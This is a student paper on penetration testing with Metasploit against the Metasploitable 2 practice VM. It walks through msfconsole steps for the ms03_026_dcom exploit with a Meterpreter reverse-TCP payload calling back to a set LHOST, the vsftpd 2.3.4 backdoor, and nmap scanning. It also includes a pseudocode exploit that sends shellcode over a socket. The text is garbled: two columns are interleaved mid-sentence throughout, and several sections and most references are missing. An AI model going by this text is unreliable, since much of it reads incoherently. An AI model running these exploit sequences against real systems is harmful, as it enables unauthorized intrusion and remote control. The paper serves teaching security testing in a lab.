Penetration Testing and Metasploit
Penetration Testing and Metasploit
Penetration Testing and Metasploit
net/publication/318710609
CITATIONS READS
6 13,272
1 author:
Michael Moore
Jackson State University
1 PUBLICATION 6 CITATIONS
SEE PROFILE
Some of the authors of this publication are also working on these related projects:
All content following this page was uploaded by Michael Moore on 26 July 2017.
Michael D. Moore
Computer Science Department
Jackson State University
Jackson, MS USA
dustan26@live.com
Abstract—In this paper, penetration testing in general will be important in our everyday lives. When people say they want
discussed, as well as how to penetration test using Metasploit on security, what is probably heard is that they want a sense of
Metasploitable 2. Metasploitable 2 is a vulnerable system that I security. It really makes sense if you think about it. Feeling
chose to use, as using any other system to do this on would be
secure isn’t necessarily the same thing as being secure. If
considering hacking and have could have bad consequences. The
main purpose of the research is to show the various tools used everyone understood what kinds of dangers are out there, they
when trying to find vulnerabilities in a system. By using would make real security their first priority.
Metasploit to test a system, we can find the vulnerabilities that Given the right environment and opportunity, anyone
need to be fixed in order to better protect the system. Certain could use the skills they learn using programs like Metasploit
areas like network protocols, firewalls, and basic security issues to stop the malicious behavior of others. When people set out
will be explored in this research. to make computer systems, they don’t initially consider every
possible exploit available within it. There are a lot of moving
While there are a lot of different ways to do penetration
testing, I have chosen to use Metasploit because of the broad uses parts when it comes to making a system and it’s everyone’s
it has and its simplicity. We will have the option of either using job to explore all the options they have in order to provide a
the community version of the product, which is mostly secure and safe system. This is where penetration testing tools
automated, or by using the command line within metasploit. Both comes in handy.
of these options will be explored in this paper. Alongside all of the When it comes to the security of computer systems, we
tools used in Metasploit, I will show how to effectively find the can never leave anything to chance. All it takes is for one
vulnerabilities within a system of your choice. After going
hacker trying to exploit a system to gain access to personal
through all of the steps in this paper, anyone should be able to try
and exploit any system they feel is vulnerable. and private data of its users and operators. By using these
testing techniques described in the paper, people can get a
Keywords— vulnerabilities, Stuxnet, penetration testing, jump on the bad guys looking to harm and infiltrate systems
Metasploit, Metasploitable 2, pen-testing, exploits, Nmap, and that do not belong to them.
Kali Linux. The things that are put into this paper are to only be used
for the appropriate manner and are no way intended to lead
one to become a hacker. The methods described are meant to
I. INTRODUCTION help one if they were intending in learning certain goals that
pertain to penetration testing of one’s own system or a system
that you have permission for.
At the very beginning of the Internet, the world had a lot There are far too many people that are taking what they are
going on for itself in terms of security. As long as you thought learning and applying it in an unethical way, which will create
about that as the fact that not many people had access to the havoc and attain a monetary gain. No one should take what
internet, therefore there were less attackers to deal with. they learn and use it against anyone in that manner.
Security wasn’t very important back then, but as the years
moved on, we got real big real fast and have been playing
catchup ever since.
With new technology being made every year, we II. PENETRATION TESTING
constantly have to come up with new ways to stop malicious
activity within our systems. Not only do businesses need Penetration testing encapsulates many different things.
constant upkeep in security, but home professionals are well, Some of those things include Wifi, networks, software, and
especially when dealing with servers. Security is so very hardware systems. Most systems have some form of
vulnerabilities present when launched. The vulnerabilities are software out into the world before it’s ready could result in
known as zero day exploits. Zero day exploits are usually catastrophic failure.
either known by the companies and just don’t think it’s bad As companies become bigger over the years, we owe it
enough to fix or don’t know about them at all. There are many to ourselves to conduct testing on all of the systems in order to
issues with the interactions between software and hardware show our products at its finest hour and not have to worry
that can remain unknown for years before they are found and about the possible zero day exploits that have been left behind.
some are never found because that issue has not presented Here shown below is just one person’s estimated damage
itself. report due to cyber crimes that could have been prevented if
Penetration testing can be defined as being a means for a maintenance on the systems would have been done.
company or business to access the vulnerabilities within it’s
system at any given time. As systems change, like the addition
of new software or hardware changes, more vulnerabilities can
present themselves. The best way to try and stop these
vulnerabilities from being found is to either hire someone
full-time to constantly do penetration testing or if money is
tight, hire someone occasionally to do the testing.
Although penetration testing by professionals might not
find every vulnerability in the system, it’s still necessary to
make sure to provide every effort possible against people who
might try to test the system maliciously. Among the many
reasons for doing penetration testing are financial
responsibilities, security issues, and information protection[2].
If you were to do penetration testing on a system that is not
yours, you should definitely make sure you get a right to hack
and nondisclosure agreement signed[2].
When it comes to protecting computer systems,
Metasploit is a good what to do that. Metasploit is only one of
many penetration testing programs available in the world. By
using this program, you will surely be able to quickly identify Source[2].
any vulnerability through the exploitation of the system, either
manually (command line style) or automatically (secure web
based GUI type).
There are many different types of penetration testing
tools available to explore. Metasploit, Kali Linux, Wireshark, III. METASPLOITABLE 2
w3af, John the Ripper, Nessus, Nmap, Dradis, and BeEf are a
few of them[1]. Some of the various types of attacks that can Metasploitable 2 is the system that is being used in the
be done on a system include BlueTooth, PC microphone, research. It is a linux based OS that is made distinctively with
wifi(Wpa-protected), and man in the middle attacks[1]. Kali Metasploit in mind to be exploited by its users. It is available
Linux is an operating system filled with various open source to download on the metasploit website for anyone who wishes
programs strictly developed with the hacker world in its mind. to use do penetration testing. Although I could use any
It’s not an operating system to be take lightly as any use of it penetration testing program I wish, I will be using Metasploit
illegally could get you jailed if you were ever caught. The two as discussed previously.
main penetration testing is either overt or covert[5]. Overt In order to set up the vulnerable machine, you need to
testing is when you have the complete cooperation of the download it from the website (www.metasploit.com) and open
owners of the systems in which you are testing on and covert the virtual machine file inside of a virtual box of your choice.
is when you are basically testing the staff’s ability to figure After having done these steps, you are on your way to test the
out the exploits being done on the system[5]. vulnerabilities of this system and also on your way to
Some of the other things to consider when having a becoming a penetration tester. All you then need to do is enter
business is the financial aspects. There are a lot of companies msfadmin for the username and password and you will be
out there that are being crippled due to lack of testing or connected shortly. Even though this is just a test system, it has
preparation. Sometimes it could be the cause of trying to get all the capabilities of any operating system that would would
the product out before it is ready. If that is the case, then one wish to test in the future.
might consider giving the project another few weeks in order
to make sure the bugs are all worked out, because putting
security issues. There are a tons of PLC’s around the world,
A. METHODS AND METHODOLOGIES and to think a worm like this one can affect any network like
Some of the methods and methodologies that are being this is very scary. “There are two main phases of Stuxnet
used include such things as Open Web Application Security worm: first is ‘propagation phase’ which is the characteristic
Project and Open Source Security Testing Methodology of each worm and second one is ‘injection phase’. In first
Manual[8]. Not all methods need to be used for every phase, Stuxnet worm propagates in local area network and
application. Some are only designed to used for certain things. update its files through peer to peer communication. In second
These methods are still integrated into today’s standards. Open phase when it finds its actual target i-e Siemens WinCC
Source Security Testing Methodology Manual can be used in control and monitoring system connected to PLC it starts
places like physical security, human factor, wireless functioning and deviates them from their normal
communication, telecommunication, data networks and behavior[13]”.
operating systems[8]. Using something like Kali Linux can
provide many uses such as SQL injection, database security
audit, network traffic eavesdropping/ tampering, network
infrastructure attack, network stress testing, denial of service
attacks, manipulating of user data, web application testing[8].
1. exploit_def() Here is where the good stuff starts. Some of the basics of
2. connection() how to access the console to do some manual exploitation of
3. exploit_preamble = "\x00\x00\x01" some systems. This process will show one example of an
4. version_find = probing_ver() exploit of a certain system, not necessarily Metasploitable 2.
5. if (version equals 5)
6. attack_payload = prepare_payload5() 1. One of the first steps is to open the console itself and
7. else enter in msfadmin for the username and the
8. attack_payload = prepare_payload4() password[4].
9. end 2. Next, you need to figure out what system and exploit
10. exploit_preamble << payload_length you wish to do[4].
11. socket.put(exploit_preamble) //Reqd by the protocol 3. Once you have that figured out and you have gotten
12. socket.get_once() the ip address of the system, you enter Nmap and
13. socket.put(attack_payload) //sending the attack then the ip address. The console will map the ports of
payload the system to see which ports are open[4].
14. socket.get_once() 4. With the open port in hand, we enter show commands
15.... # triggering vulnerability and find an exploit in the list that deals with remote
16. end pc[4].
17. def prepare_payload5() 5. “To get more information regarding the exploit you
18. attack_payload = shellcode can use the command, ‘info
19. attack_payload << rand_alpha(payload.length) exploit/windows/dcerpc/ms03_026_dcom’[4]”.
20. attack_payload << "\x010" + [-117].pack("X")
6. Then, we need to enter use/”exploit” into the 7. Just like with the manual version, after gaining
console[4]. access, you have free roam on the system you now
7. Once that’s finished loading, we are going to need to control.
enter show options to find out what to do next to get
the exploit going further[4]. D. Common Exploits Known
8. Next, we need to enter the ip address ( set RHOST”ip
address”)we wish to exploit, and find the payload to 1. VSFTP Backdoor:
push onto the open port[4]. This exploit allows the user to gain access to the shell
9. We need to enter in show payloads to find compatible via a backdoor that was made in 2011 and removed
payloads for this exploit[4]. shortly thereafter.
10. "set PAYLOAD windows/meterpreter/reverse_tcp"
needs to be entered now into the console and then"set 2. MS08-067:
LHOST 192.168.42.128"[4] . This vulnerability relates to a remote pc entry given
11. Now enter check command to see if the “machine a certain request is entered[5].
vulnerable to the exploit or not” and if not just move
on with the command, exploit to perform the VSFTP Backdoor instructions[7]:
exploit[4]. 1. Login to the msf console.
12. If everything works like it’s supposed to, you should 2. Find your IP address.
gain access to the system and be able to do anything 3. Obtain the IP address from the Metasploitable 2
you want on the system. machine or whatever system you are exploiting..
4. Next, the user will then enter nmap -sS -sV -O
C. Metasploit Community (Metasploitable 2 IP address). This will provide you
with everything you can know about the ports on the
This version is a lot more simplistic to use since it is that particular system.
automated. When you download Metasploit, it comes with this 5. Enter “search vsftp[7].”
option which is done on your browser using you computer as 6. Enter “use exploit/unix/ftp/vsftpd_234_backdoor[7].”
the local host, which does all of the exploiting. Metasploit 7. Enter “show options[7].”
community was mainly invented to help bridge the gap 8. Enter “set RHOST”
between everyday penetration testers and people looking to do IPAddressofMachineExploiting[7].
the testing without really understanding every aspect of it. 9. Finally enter “exploit”.
Although using the community seems faster, you still need to
read up on all of the different techniques to be efficient at the
testing.
http://searchsecurity.techtarget.com/tip/Using-Metasploit-for-real-world-
security-tests. [Accessed: 15-Apr-2017].
VII. CONCLUSION [11] D. Dodd, “Penetration Testing and Shell Tossing with Meta... » ADMIN
Magazine,” ADMIN Magazine. [Online]. Available:
There are a lot of penetration testing programs out there and http://www.admin-magazine.com/Articles/Pen-Test-Tips. [Accessed:
Metasploit just so happens to be the best one that I could think 17-Apr-2017].
of to share with you. It has a lot of nice options and you can [12] “Hack the Fartknocker VM (CTF Challenge),” Hacking Articles,
use it either manually or automatically. Although the reasons 06-Apr-2017. [Online]. Available:
for and against the two have already been shown throughout http://www.hackingarticles.in/hack-fartknocker-vm-ctf-challenge/.
[Accessed: 18-Apr-2017].
the paper, I’d like to reiterate a few things. By doing all the
[13] R. Masood, U.-E.-G., and Z. Anwar, “SWAM: Stuxnet Worm Analysis
exploiting manual, you are able to control the way you try to in Metasploit,” 2011 Frontiers of Information Technology, 2011.
exploit a given system, it just might take a little bit longer.
Penetration testing is just one of the multiple ways to make
sure the information on your systems is secure and not open to
hacking. When you plan on doing penetration testing, I
suggest you give Metasploit a shot and you won’t be
disappointed. When looking into what programs that are
available to use across the internet, there are a lot of different
options to choose from. If you are not careful with any of the
programs, you could land yourself into some serious trouble.
REFERENCES